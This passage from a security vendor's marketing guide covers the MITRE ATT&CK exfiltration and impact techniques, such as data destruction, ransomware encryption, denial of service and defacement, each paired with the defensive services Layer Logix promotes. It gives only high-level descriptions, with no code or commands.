Exfiltration Over C2 Channel (T1041): Using the established C2 channel to exfiltrate data.

Exfiltration Over Web Service (T1567): Uploading data to web services like cloud storage or code repositories.

Layer Logix Protection:

Outbound Traffic Monitoring: Analyzes outgoing traffic for signs of data exfiltration.

Data Loss Prevention (DLP): Blocks unauthorized data transfers.

User Activity Monitoring: Detects abnormal user behaviors that may indicate exfiltration.

Impact

Attack Vector Summary: Impact techniques are used to disrupt or destroy systems and data, affecting the availability, integrity, and confidentiality of resources.

Techniques and Sub-Techniques

T1485 Data Destruction - N/A

T1486 Data Encrypted for Impact - N/A

T1499 Endpoint Denial of Service
- T1499.001: OS Exhaustion Flood
- T1499.002: Service Exhaustion Flood

T1529 System Shutdown/Reboot - N/A

T1491 Defacement
- T1491.001: Internal Defacement
- T1491.002: External Defacement

Expanded Information:

Data Destruction (T1485): Deleting or overwriting files to disrupt operations.

Data Encrypted for Impact (T1486): Encrypting files and demanding ransom for decryption keys.

Layer Logix Protection:

Backup Solutions: Maintains regular backups to restore data after destruction or encryption.

Ransomware Protection: Uses specialized tools to detect and block ransomware activities.

Incident Response Planning: Prepares for quick recovery from impact events.

Conclusion

Understanding the MITRE ATT&CK framework enables organizations to anticipate and defend against sophisticated cyber threats. Layer Logix integrates this framework into its cybersecurity solutions, providing comprehensive protection across all stages of the attack lifecycle.

Key Advantages of Layer Logix:

Proactive Threat Hunting: Continuously searches for threats within the network.

Advanced Analytics: Utilizes AI and machine learning to detect anomalies.

Customizable Security Policies: Tailors defenses to the organization's unique environment.

Comprehensive Reporting: Offers detailed insights into security posture and incidents.

Secure your organization with Layer Logix and fortify your defenses against advanced cyber threats.

Note: This guide is based on the MITRE ATT&CK framework as of October 2023. For the latest updates, please visit the official MITRE ATT&CK website.
